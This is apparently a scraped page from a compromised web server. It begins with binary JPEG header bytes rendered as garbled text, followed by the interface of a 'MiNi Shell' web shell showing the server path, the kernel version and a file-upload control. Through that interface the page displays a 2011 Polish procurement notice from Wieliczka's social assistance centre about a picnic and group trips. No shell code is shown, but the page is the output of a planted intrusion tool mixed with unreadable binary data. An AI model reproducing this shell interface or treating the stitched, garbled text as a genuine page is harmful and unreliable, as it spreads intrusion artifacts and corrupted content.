JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/306407-N-2011.html

<p class="kh_header"><b>Wieliczka: Świadczenie usług z zakresu aktywizacji społeczno-zawodowej - realizacji Projektu Systemowego   Czas na Aktywność. Aktywność  społeczna i zawodowa klientów Ośrodka Pomocy Społecznej z podziałem na:

Część I-  Zorganizowanie w ramach działań o charakterze środowiskowym Pikniku  
Część II - Zorganizowanie wyjazdu do Krakowa, Wadowic i Kalwarii Zebrzydowskiej
Część III -  Zorganizowanie wyjazdu dla BO do Zakopanego lub okolic</b><br>
<b>Numer ogłoszenia: 306407 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Sienkiewicza 26, 32-020 Wieliczka, woj. małopolskie, tel. 12 278 19 55, faks 12 278 19 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mgopswieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług z zakresu aktywizacji społeczno-zawodowej - realizacji Projektu Systemowego   Czas na Aktywność. Aktywność  społeczna i zawodowa klientów Ośrodka Pomocy Społecznej z podziałem na:

Część I-  Zorganizowanie w ramach działań o charakterze środowiskowym Pikniku  
Część II - Zorganizowanie wyjazdu do Krakowa, Wadowic i Kalwarii Zebrzydowskiej
Część III -  Zorganizowanie wyjazdu dla BO do Zakopanego lub okolic.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest: Świadczenie usług z zakresu aktywizacji społeczno-zawodowej - realizacji Projektu Systemowego Czas na Aktywność. Aktywność społeczna i zawodowa klientów Ośrodka Pomocy Społecznej z podziałem na:

Część I - Zorganizowanie w ramach działań o charakterze środowiskowym Pikniku 
Część II - Zorganizowanie wyjazdu do Krakowa, Wadowic i Kalwarii Zebrzydowskiej 
Część III - Zorganizowanie wyjazdu dla BO do Zakopanego lub okolic 

3.1. Część I: Zorganizowanie w ramach działań o charakterze środowiskowym Pikniku 
Przedmiotem zamówienia dla Części I jest zorganizowanie i przeprowadzenie  Pikniku w miejscowości Pawlikowice dla 100 osób w dniach: 10.12.2011r. w godzinach od 14.00-20.00, w pomieszczeniu zapewnionym przez zamawiającego. W trakcie  trwania imprezy prosimy o zapewnienie: zabaw dla dzieci, zabaw dla dorosłych, zabaw rodzinnych. Zabawy powinny trwać przez cały czas trwania imprezy  i powinny być przeprowadzone przez osobę profesjonalnie do tego przygotowaną. Należy przygotować stoisko  z poradami medycznymi (np. mierzenie ciśnienia, zawartości tłuszczu w organizmie) oraz zapewnić oprawę muzyczną.
W czasie Pikniku należy zapewnić catering w postaci: napojów chłodzących w ilości 50 litrów wód mineralnych, 50 sztuk 2-litrowych soków, krokiety w ilości 100 sztuk, pierogi 200 sztuk / 100 sztuk z kapustą i grzybami, 100 sztuk pierogi ruskie/, strogonow w ilości 250 ml x 100 osób, kanapki w ilości 200 sztuk, ciasto w ilości 15 kg różne , kawa, herbata, owoce: jabłka, pomarańcze, banany, mandarynki, w ilości 10 kg łącznie.
Należy zadbać o estetykę stołów z cateringiem tzn. obrusy, patery na owoce, patery na ciasto, termosy z kawą i herbatą, podgrzewacze z daniami gorącymi, talerze, kubki, sztućce.
Uczestnikom zabaw i gier należy zapewnić nagrody w ilości nie mniej niż 15 sztukx30zł średnio 
na 1 osobę.
Przewidziany czas trwania pikniku  - 6 godzin. 


3.2. Część II: Zorganizowanie wyjazdu do Krakowa, Wadowic i Kalwarii Zebrzydowskiej  
Przedmiotem zamówienia dla Części II jest: Wycieczka z Pawlikowic dla 50 osób w tym: 24 osoby dorosłe do Wadowic i Kalwarii Zebrzydowskiej i 26 osób młodzież i dzieci  do Krakowa 
Wyjazd z Pawlikowic w okresie od 12.12.2011 do 18.12.2011 o godz. 9.00.

Plan wycieczki z Pawlikowic  do Krakowa:
Ogród Doświadczeń - zabawa w poszukiwaniu zaginionej szkatułki
Muzeum Lotnictwa - zwiedzanie ekspozycji
Obiad składający się z dwóch dań 
Zupa - 250 gram
Ziemniaki, 150-200 gram, kotlet schabowy lub drobiowy - 200 gram, sałatki - 200 gram
Deser
 - ciasto tortowe w ilości - 200 gram
Ogród botaniczny - zwiedzanie
Seans filmowy w kinie ARS.

Plan wycieczki z Pawlikowic -  do Wadowic, Kalwarii Zebrzydowskiej
Przejazd do Kalwarii Zebrzydowskiej - msza w Sanktuarium, przejście Dróżkami
Wadowice - zwiedzanie Muzeum Ojca Świętego Jana Pawła II
Modlitwa w Bazylice Ofiarowania Najświętszej Maryi Panny w Wadowicach
Obiad składający się z dwóch dań:
Zupa - 250 gram
Ziemniaki, 150-200 gram, kotlet schabowy lub drobiowy - 200 gram, sałatki - 200 gram
Spacer po rynku w Wadowicach oraz degustacja Papieskiej kremówki w ilości 1 sztuki każdy uczestnik wycieczki.
Powrót  uczestników wycieczek do miejscowości Pawlikowice.

3.3. Część III: Zorganizowanie wyjazdu dla BO do Zakopanego lub okolic w promieniu do 15 km 
1) Przedmiotem zamówienia dla Części III jest zorganizowanie wyjazdu integracyjno-szkoleniowego dla 29 osób w tym:
- 24 BO - uczestnicy projektu (odbiorcy usług - osoby dorosłe)
- 2 osoby pracownicy MGOPS (obserwatorzy)
- 3 osoby Asystenci Rodzin
 wraz z zakwaterowaniem i wyżywieniem w weekend w okresie od 08.12.2011 do 18.12.2011 r.
/3 dni pobytowe do Zakopanego lub do miejscowości w promieniu 15 km/ 
- Piątek - obiad / zupa 250 gram, ziemniaki lub frytki 200 gram, ryba smażona 250 gram, sałatka 200 gram/,  deser, kolacja 
- Sobota - śniadanie /stół szwedzki/, obiad /zupa 250 gram, ziemniaki, frytki 200 gram, kotlet drobiowy 250 gram/, deser, kolacja 
- Niedziela - śniadanie /stół szwedzki/
W czasie wyjazdu należy przeprowadzić warsztaty szkoleniowe z zakresu zagrożeń ryzykownych wśród młodzieży i dzieci w ilości 8 godzin dydaktycznych  wyłącznie przez wykwalifikowaną kadrę. 
W sobotę należy zapewnić uczestnikom wyjazd  kolejką  na Kasprowy Wierch. 
Wykonawca zapewni uczestnikom wyjazdów: opiekunów, transport autokarowy.
Wykonawca zapewni, iż uczestnicy przewożeni będą zgodnie z obowiązującymi w zakresie przewozu osób przepisami prawa (m.in. aktualne badania techniczne pojazdu, którym będą podróżować uczestnicy, aktualna licencja na wykonywanie krajowego transportu drogowego osób - dla przewoźnika, odpowiednie kwalifikacje zawodowe kierowców, ubezpieczenie dla beneficjentów ostatecznych i pozostałych uczestników wyjazdu).
Wykonawca zapewni kadrę gwarantującą prawidłową organizację wyjazdu integracyjno - szkoleniowego.
Wykonawca dokona opłaty klimatycznej za wszystkich uczestników wyjazdu jeśli wymagać będzie tego lokalizacja ośrodka
W razie konieczności Wykonawca zapewni opiekę medyczną uczestnikom wyjazdu w tym zorganizowanie transportu.

3.4 Pozostałe warunki dla wszystkich części zamówienia:
1) Zamawiający zastrzega sobie prawo do zmiany liczby uczestników (odbiorców usług) w sytuacjach niezależnych od zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy np. choroba uczestnika itp. O zaistniałej sytuacji Zamawiający pisemnie zawiadomi niezwłocznie Wykonawcę.
2) Zamawiający zastrzega, że jeśli którykolwiek z uczestników projektu z różnych przyczyn nie będzie mógł wziąć udziału w projekcie, wówczas wszystkie formy wsparcia realizowane na tych zajęciach zostaną dla tych osób przeprowadzone zamiennie (tzw. zajęcia zamienne) przez prowadzących wykonawcy na terenie gminy Wieliczka w formie i ilości godzin zajęć grupowych przewidzianych na zajęciach.
3) Dokumentacja realizowanych działań dla wszystkich części odbywać się musi między innymi za pomocą dzienników prowadzonych zajęć, imiennych list obecności. Każdy z uczestników zajęć musi otrzymać zaświadczenie potwierdzające uczestnictwo w projekcie, które będzie zawierało logotypy UE oraz wykaz tematów z liczbą zrealizowanych godzin.
4) Wykonawca dla wszystkich części  jest zobowiązany ubezpieczyć uczestników zajęć od następstw nieszczęśliwych wypadków przez cały okres trwania zajęć zgodnie z obowiązującymi przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 85.12.12.70-6, 55.12.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Dla Wykonawców składających ofertę dla Części II:
- dysponować co najmniej dwoma autobusami lub busami: co najmniej jeden -  26 osób (dzieci i młodzieży)+ opieka w celu zapewnienia wyjazdu do Krakowa, oraz co najmniej jeden  na 24 osoby dorosłe + opieka do Wadowic oraz Kalwarii Zebrzydowskiej;

b) Dla Wykonawców składających ofertę dla Części III:
 - dysponować w celu wykonania zamówienia autokarem na co najmniej 29 osób,
- dysponować w celu wykonania zamówienia hotelem lub domem noclegowym w Zakopanym lub w promieniu 15 km,

Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków / nie złożył dokumentów potwierdzających spełnianie warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) Dla Wykonawców składających ofertę dla Części III:
- dysponować w celu wykonania zamówienia co najmniej jednym wykwalifikowanym psychologiem,

Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków / nie złożył dokumentów potwierdzających spełnianie warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz Karty tytułowej oferty stanowiący Zał. nr 1 do SIWZ.
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z Art. 22 ust. 1 uPzp - Zał. Nr 2 do SIWZ.
4. Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy sporządzone według formularza stanowiącego Zał. nr 4 do SIWZ ( jeżeli wykonawca nie złoży załącznika nr 4 Zamawiający będzie rozumiał, że wykonawca nie powierza części zamówienia podwykonawcy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
1. zmian nazwy, siedziby lub innych danych Wykonawcy;
2. prośby Wykonawcy o udział lub zmianę podwykonawców;
3. zmiany osób wymienionych w wykazie osób uczestniczących w wykonywaniu zamówienia, w przypadkach uzasadnionych przez Wykonawcę (np. choroba, śmierć, utrata uprawnień);
4. zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur administracyjnych (np. związanych z procedurą zamówień publicznych,  pozyskiwaniem dodatkowych uzgodnień lub decyzji);
5. zmniejszenie ilości zamówienia wynikające z faktu, iż realizacja części usług, które stanowią przedmiot zamówienia stała się dla zamawiającego nieuzasadniona społecznie lub ekonomicznie;
6. wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgopswieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Wieliczce, 32-020 Wieliczka, ul. Sienkiewicza 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2011 godzina 11:50, miejsce: dziennik podawczy Miejsko-Gminnego Ośrodka Pomocy Społecznej w Wieliczce, ul. Sienkiewicza 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I-  Zorganizowanie w ramach działań o charakterze środowiskowym Pikniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1. Część I: Zorganizowanie w ramach działań o charakterze środowiskowym Pikniku 
Przedmiotem zamówienia dla Części I jest zorganizowanie i przeprowadzenie  Pikniku w miejscowości Pawlikowice dla 100 osób w dniach: 10.12.2011r. w godzinach od 14.00-20.00, w pomieszczeniu zapewnionym przez zamawiającego. W trakcie  trwania imprezy prosimy o zapewnienie: zabaw dla dzieci, zabaw dla dorosłych, zabaw rodzinnych. Zabawy powinny trwać przez cały czas trwania imprezy  i powinny być przeprowadzone przez osobę profesjonalnie do tego przygotowaną. Należy przygotować stoisko  z poradami medycznymi (np. mierzenie ciśnienia, zawartości tłuszczu w organizmie) oraz zapewnić oprawę muzyczną.
W czasie Pikniku należy zapewnić catering w postaci: napojów chłodzących w ilości 50 litrów wód mineralnych, 50 sztuk 2-litrowych soków, krokiety w ilości 100 sztuk, pierogi 200 sztuk / 100 sztuk z kapustą i grzybami, 100 sztuk pierogi ruskie/, strogonow w ilości 250 ml x 100 osób, kanapki w ilości 200 sztuk, ciasto w ilości 15 kg różne , kawa, herbata, owoce: jabłka, pomarańcze, banany, mandarynki, w ilości 10 kg łącznie.
Należy zadbać o estetykę stołów z cateringiem tzn. obrusy, patery na owoce, patery na ciasto, termosy z kawą i herbatą, podgrzewacze z daniami gorącymi, talerze, kubki, sztućce.
Uczestnikom zabaw i gier należy zapewnić nagrody w ilości nie mniej niż 15 sztukx30zł średnio 
na 1 osobę.
Przewidziany czas trwania pikniku  - 6 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Zorganizowanie wyjazdu do Krakowa, Wadowic i Kalwarii Zebrzydowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2. Część II: Zorganizowanie wyjazdu do Krakowa, Wadowic i Kalwarii Zebrzydowskiej  
Przedmiotem zamówienia dla Części II jest: Wycieczka z Pawlikowic dla 50 osób w tym: 24 osoby dorosłe do Wadowic i Kalwarii Zebrzydowskiej i 26 osób /młodzież i dzieci / do Krakowa 
Wyjazd z Pawlikowic w okresie od 12.12.2011 do 18.12.2011 o godz. 9.00.

Plan wycieczki z Pawlikowic  do Krakowa:
Ogród Doświadczeń - zabawa w poszukiwaniu zaginionej szkatułki
Muzeum Lotnictwa - zwiedzanie ekspozycji
Obiad składający się z dwóch dań 
Zupa - 250 gram
Ziemniaki, 150-200 gram, kotlet schabowy lub drobiowy - 200 gram, sałatki - 200 gram
Deser
 - ciasto tortowe w ilości - 200 gram
Ogród botaniczny - zwiedzanie
Seans filmowy w kinie ARS.

Plan wycieczki z Pawlikowic -  do Wadowic, Kalwarii Zebrzydowskiej
Przejazd do Kalwarii Zebrzydowskiej - msza w Sanktuarium, przejście Dróżkami
Wadowice - zwiedzanie Muzeum Ojca Świętego Jana Pawła II
Modlitwa w Bazylice Ofiarowania Najświętszej Maryi Panny w Wadowicach
Obiad składający się z dwóch dań:
Zupa - 250 gram
Ziemniaki, 150-200 gram, kotlet schabowy lub drobiowy - 200 gram, sałatki - 200 gram
Spacer po rynku w Wadowicach oraz degustacja Papieskiej kremówki w ilości 1 sztuki każdy uczestnik wycieczki.
Powrót  uczestników wycieczek do miejscowości Pawlikowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III -  Zorganizowanie wyjazdu dla BO do Zakopanego lub okolic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.3. Część III: Zorganizowanie wyjazdu dla BO do Zakopanego lub okolic w promieniu do 15 km 
1) Przedmiotem zamówienia dla Części III jest zorganizowanie wyjazdu integracyjno-szkoleniowego dla 29 osób w tym:
- 24 BO - uczestnicy projektu (odbiorcy usług - osoby dorosłe)
- 2 osoby pracownicy MGOPS (obserwatorzy)
- 3 osoby Asystenci Rodzin
 wraz z zakwaterowaniem i wyżywieniem w weekend w okresie od 08.12.2011 do 18.12.2011 r.
/3 dni pobytowe do Zakopanego lub do miejscowości w promieniu 15 km/ 
- Piątek - obiad / zupa 250 gram, ziemniaki lub frytki 200 gram, ryba smażona 250 gram, sałatka 200 gram/,  deser, kolacja 
- Sobota - śniadanie /stół szwedzki/, obiad /zupa 250 gram, ziemniaki, frytki 200 gram, kotlet drobiowy 250 gram/, deser, kolacja 
- Niedziela - śniadanie /stół szwedzki/
W czasie wyjazdu należy przeprowadzić warsztaty szkoleniowe z zakresu zagrożeń ryzykownych wśród młodzieży i dzieci w ilości 8 godzin dydaktycznych  wyłącznie przez wykwalifikowaną kadrę. 
W sobotę należy zapewnić uczestnikom wyjazd  kolejką  na Kasprowy Wierch. 
Wykonawca zapewni uczestnikom wyjazdów: opiekunów, transport autokarowy.
Wykonawca zapewni, iż uczestnicy przewożeni będą zgodnie z obowiązującymi w zakresie przewozu osób przepisami prawa (m.in. aktualne badania techniczne pojazdu, którym będą podróżować uczestnicy, aktualna licencja na wykonywanie krajowego transportu drogowego osób - dla przewoźnika, odpowiednie kwalifikacje zawodowe kierowców, ubezpieczenie dla beneficjentów ostatecznych i pozostałych uczestników wyjazdu).
Wykonawca zapewni kadrę gwarantującą prawidłową organizację wyjazdu integracyjno - szkoleniowego.
Wykonawca dokona opłaty klimatycznej za wszystkich uczestników wyjazdu jeśli wymagać będzie tego lokalizacja ośrodka
W razie konieczności Wykonawca zapewni opiekę medyczną uczestnikom wyjazdu w tym zorganizowanie transportu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 85.12.12.70-6, 55.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com